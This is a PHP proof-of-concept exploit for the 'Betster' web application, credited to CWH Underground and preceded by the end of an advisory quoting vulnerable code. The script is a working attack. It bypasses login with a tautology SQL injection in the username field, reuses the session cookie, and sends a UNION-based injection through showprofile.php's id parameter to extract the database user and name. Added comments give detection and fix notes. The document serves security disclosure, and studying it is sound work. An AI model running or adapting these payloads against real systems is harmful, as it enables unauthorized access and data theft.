getState()) && (($user->getStatus() == "administrator") || ($user->getStatus() == "betmaster"))){
    $mainhtml = file_get_contents("tpl/showprofile.inc");
    $id = htmlspecialchars($_GET['id']);               <<<< WTF !!
    $xuser = $db_mapper->getUserById($id);

-----------------------------------------------------------------------------
/categoryedit.php (LINE: 52)
-----------------------------------------------------------------------------

    $id = htmlspecialchars($_GET['id']);               <<<< WTF !!
    $action = htmlspecialchars($_GET['ac']);

-----------------------------------------------------------------------------

###########################################
VULNERABILITY: Authentication Bypass (SQLi)
###########################################

File index.php (Login function) has an SQL injection vulnerability in the
"username" parameter supplied via POST when checking for valid credentials.
The "username" parameter is not validated before being passed into the SQL
query, which gives rise to an authentication bypass.

#####################################################
EXPLOIT
#####################################################

*/

# Proof-of-concept for the advisory above: one login POST carrying the
# tautology in "username", then one GET to showprofile.php carrying a UNION
# query in "id". Both requests go over plain HTTP on port 80.

# Silence PHP warnings (a failed fsockopen is reported by the die() inside
# http_send instead), lift the run-time limit and give sockets a 50 s timeout.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 50);

# Open a plain TCP connection to port 80 on $host (no TLS; the port is
# hard-coded), write the raw HTTP request held in $packet and return the
# whole response as one string. Dies if the connection cannot be opened.
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+---------------------------------------------+";
print "\n| Betster Auth Bypass & SQL Injection Exploit |";
print "\n+---------------------------------------------+\n";

# $argv[1] is the target host, $argv[2] the application's web root path.
# The path is concatenated directly with "index.php" / "showprofile.php"
# below, so it has to end in "/" as in the examples.
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] \n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /betster/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

# Login form body. The username field is a single quote followed by an
# always-true OR clause, i.e. the injection the advisory describes.
# Defender notes: a quote followed by "or 'a'='a" in a login POST body is
# the pattern to alert on, and the application-side fix is a parameterised
# query -- htmlspecialchars(), as used in the code quoted above, is an HTML
# encoder, not an SQL escape.
$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";

# Unauthenticated GET to the web root, issued only to be handed a session
# cookie.
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

print "\n ,--^----------,--------,-----,-------^--, \n";
print " | 
||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";

$response = http_send($host, $packet);

# Keep the first Set-Cookie name=value pair; $sid[1] is replayed as the
# Cookie header on both later requests so the same session is reused.
# Only the first Set-Cookie header is captured; any further one is ignored.
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");

# Login POST carrying $payload under the session obtained above.
$packet = "POST {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

print "\n\n[+] Bypassing Authentication...\n";
sleep(2);   # cosmetic pause only
$response=http_send($host, $packet);

# Success is inferred from the admin menu title appearing in the post-login
# page; any other response aborts the script here.
preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n");

# Authenticated GET to showprofile.php with a UNION-based injection in the
# "id" query parameter (the first snippet quoted in the advisory). The
# injected SELECT places user() and database() between "::" markers (the
# 0x3a3a literals) so the regex below can cut them out of the returned HTML;
# the seven-column UNION is presumably sized to match the application's own
# query. Defender notes: "union select", "--+" and hex-encoded literals in a
# query string appear verbatim in web server access logs and are covered by
# stock WAF/IDS SQLi rules; the code-level fix is again a parameterised query.
$packet = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

print "[+] Performing SQL Injection Attack\n";
sleep(2);   # cosmetic pause only
$response1=http_send($host, $packet);

# Print whatever the page returned between the "::" markers, otherwise abort.
preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n");

################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>